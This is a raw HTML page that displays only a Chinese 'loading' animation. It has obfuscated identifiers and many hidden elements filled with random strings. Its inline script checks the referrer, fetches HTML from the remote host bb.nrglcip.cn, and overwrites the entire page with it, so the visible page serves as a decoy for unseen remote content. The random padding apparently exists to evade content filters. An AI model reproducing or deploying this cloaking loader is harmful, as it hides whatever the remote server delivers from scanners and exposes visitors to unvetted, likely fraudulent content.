<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .jTe79fdb {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .jTe79fdb .MuwYUvibohQ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .jTe79fdb .content {
            line-height: 50px;
            text-align: center
        }

        .jTe79fdb .img {
            width: 100%
        }

        .jTe79fdb .NGh1GDJ {
            text-align: center
        }

        .jTe79fdb .NGh1GDJ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .jTe79fdb .NGh1GDJ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .jTe79fdb .NGh1GDJ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .jTe79fdb .NGh1GDJ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .jTe79fdb .NGh1GDJ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .jTe79fdb .NGh1GDJ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .jTe79fdb .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Uw0iUQRpmx9m(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var XDmM6 = Uw0iUQRpmx9m('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ XDmM6 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ XDmM6 +".html?a=share";
		}
		
        QxRxWn4t=url+"#"+new Date().getTime();
        QxRxWn4t && function() {
            $.get(QxRxWn4t, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>vau2JBUtj5y</span>
<a  href='#' style='display:none'>Vv8h8YPauSDXlqLgY66ChCQQBOS6Q4DFk8lrdtNWCtyUcKCdVXy50b3g9wjE1fgMii6HgD8HXlcpIGC6</a>
<li style='display:none' >h25lyolJQit6W0WwhFuHWwl</li>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>Vv8h8YPauSDXlqLgY66ChCQQBOS6Q4DFk8lrdtNWCtyUcKCdVXy50b3g9wjE1fgMii6HgD8HXlcpIGC6</a>
<li style='display:none' >h25lyolJQit6W0WwhFuHWwl</li>
<a  href='#' style='display:none'>Vv8h8YPauSDXlqLgY66ChCQQBOS6Q4DFk8lrdtNWCtyUcKCdVXy50b3g9wjE1fgMii6HgD8HXlcpIGC6</a>
<img  src='' style='display:none'>
<li style='display:none' >h25lyolJQit6W0WwhFuHWwl</li>
<div style='display:none'>I2rm9rR8C9XwFfXET0h9Rd71Sqo9g3XriqyuVBpkW8au2gSmQnIgrFOKzVULw1fzyJafm1y9MqvOnXSHw04VajFH9BRGhvhwcQ</div><div class="jTe79fdb">
    <div class="MuwYUvibohQ">
        <div class="NGh1GDJ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>epvLoBx0iIZWBsN6lXlPhAHFi1Rq65EECc40py3I1ihQMuMo9ssbN9iqMovRN9ouc4XKGdmTODYmU</span>
<p  style='display:none'>h3JWUDDTgSIyBWeuQvtS31CPJJtSGe3fZiVv6k7M4AXBVzQURZu4wHvszOhgYqd2r4f</p>
<img  src='' style='display:none'>
<h1 style='display:none' >e81rSQD5zEJzSigycvZsw7mVEpwaotFMBLT57elAeaHeAN92YX6WFIoIZI6zi07JnpsgZYqS0CLyk6</h1>
<span style='display:none'>epvLoBx0iIZWBsN6lXlPhAHFi1Rq65EECc40py3I1ihQMuMo9ssbN9iqMovRN9ouc4XKGdmTODYmU</span>
<span style='display:none'>epvLoBx0iIZWBsN6lXlPhAHFi1Rq65EECc40py3I1ihQMuMo9ssbN9iqMovRN9ouc4XKGdmTODYmU</span>
<a  href='#' style='display:none'>FkpMl7rPpQgNsuNbXwAKE1oSNOKvBh48f2kh7lnyjJCjWYstakH9ws9prfXGSrH8</a>
<span style='display:none'>epvLoBx0iIZWBsN6lXlPhAHFi1Rq65EECc40py3I1ihQMuMo9ssbN9iqMovRN9ouc4XKGdmTODYmU</span></body>
</html>